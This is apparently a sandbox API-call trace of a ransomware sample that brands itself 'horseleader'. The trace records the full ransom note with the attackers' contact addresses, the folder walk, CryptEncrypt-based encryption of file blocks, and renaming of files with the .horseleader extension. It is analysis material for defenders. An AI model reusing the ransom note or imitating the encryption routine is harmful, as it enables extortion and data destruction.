many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0249.197] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0249.198] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0249.198] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0249.198] CloseHandle (hObject=0x158) returned 1 [0249.199] GetProcessHeap () returned 0x780000 [0249.199] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0249.199] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 0 [0249.199] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0249.199] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\#Decrypt#.txt") returned 72 [0249.199] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0249.203] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0249.203] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0249.204] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0249.204] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0249.204] CloseHandle (hObject=0x21c) returned 1 [0249.204] GetProcessHeap () returned 0x780000 [0249.205] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0249.205] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VBA", cAlternateFileName="")) returned 1 [0249.205] lstrcmpiW (lpString1="VBA", lpString2="Windows") returned -1 [0249.205] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA") returned 54 [0249.205] lstrcmpW (lpString1="VBA", lpString2=".") returned 1 [0249.205] lstrcmpW (lpString1="VBA", lpString2="..") returned 1 [0249.205] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0249.205] GetProcessHeap () returned 0x780000 [0249.205] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0249.205] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*") returned 56 [0249.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0249.206] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0249.206] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\.") returned 56 [0249.206] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0249.206] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0249.207] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0249.207] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\..") returned 57 [0249.207] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0249.207] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0249.207] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="VBA7", cAlternateFileName="")) returned 1 [0249.207] lstrcmpiW (lpString1="VBA7", lpString2="Windows") returned -1 [0249.207] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7") returned 59 [0249.207] lstrcmpW (lpString1="VBA7", lpString2=".") returned 1 [0249.207] lstrcmpW (lpString1="VBA7", lpString2="..") returned 1 [0249.207] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0249.207] GetProcessHeap () returned 0x780000 [0249.207] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0249.207] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*") returned 61 [0249.207] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0249.208] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0249.208] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\.") returned 61 [0249.208] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0249.208] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName="..", cAlternateFileName="")) returned 1 [0249.208] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0249.208] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\..") returned 62 [0249.208] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0249.208] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0249.208] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25685a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName="1033", cAlternateFileName="")) returned 1 [0249.208] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0249.208] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033") returned 64 [0249.208] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0249.208] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0249.208] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0249.208] GetProcessHeap () returned 0x780000 [0249.208] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0249.209] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*") returned 66 [0249.209] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25685a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0249.268] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0249.268] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\.") returned 66 [0249.268] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0249.269] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25685a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="..", cAlternateFileName="")) returned 1 [0249.269] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0249.269] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\..") returned 67 [0249.269] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0249.269] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0249.269] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1574f00, ftCreationTime.dwHighDateTime=0x1be23e3, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1574f00, ftLastWriteTime.dwHighDateTime=0x1be23e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a5b, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="FM20.CHM", cAlternateFileName="")) returned 1 [0249.270] lstrcmpiW (lpString1="FM20.CHM", lpString2="Windows") returned -1 [0249.270] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 73 [0249.270] StrStrIW (lpFirst="FM20.CHM", lpSrch=".horseleader") returned 0x0 [0249.270] lstrcmpW (lpString1="FM20.CHM", lpString2="#Decrypt#.txt") returned 1 [0249.270] lstrcmpW (lpString1="FM20.CHM", lpString2="_uninstalling_.png") returned 1 [0249.270] lstrlenW (lpString=".testttjffg") returned 11 [0249.270] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM", lpSrch=".testttjffg") returned 0x0 [0249.270] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0249.270] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0249.270] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0249.271] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 73 [0249.271] StrStrW (lpFirst="FM20.CHM", lpSrch=".txt") returned 0x0 [0249.271] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=334427) returned 1 [0249.271] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0249.271] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.849] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0249.850] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.850] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x2652d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0249.850] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.868] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0249.868] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.868] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x4ca5b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0249.868] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.879] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0249.879] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.879] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0249.880] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0249.880] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0249.880] CloseHandle (hObject=0x15c) returned 1 [0249.880] GetProcessHeap () returned 0x780000 [0249.880] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0249.880] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.horseleader") returned 85 [0249.880] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm.horseleader")) returned 1 [0249.881] GetProcessHeap () returned 0x780000 [0249.882] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0249.882] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6edd8500, ftCreationTime.dwHighDateTime=0x1c685f9, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6edd8500, ftLastWriteTime.dwHighDateTime=0x1c685f9, nFileSizeHigh=0x0, nFileSizeLow=0x1ac96, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBCN6.CHM", cAlternateFileName="")) returned 1 [0249.882] lstrcmpiW (lpString1="VBCN6.CHM", lpString2="Windows") returned -1 [0249.882] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 74 [0249.882] StrStrIW (lpFirst="VBCN6.CHM", lpSrch=".horseleader") returned 0x0 [0249.882] lstrcmpW 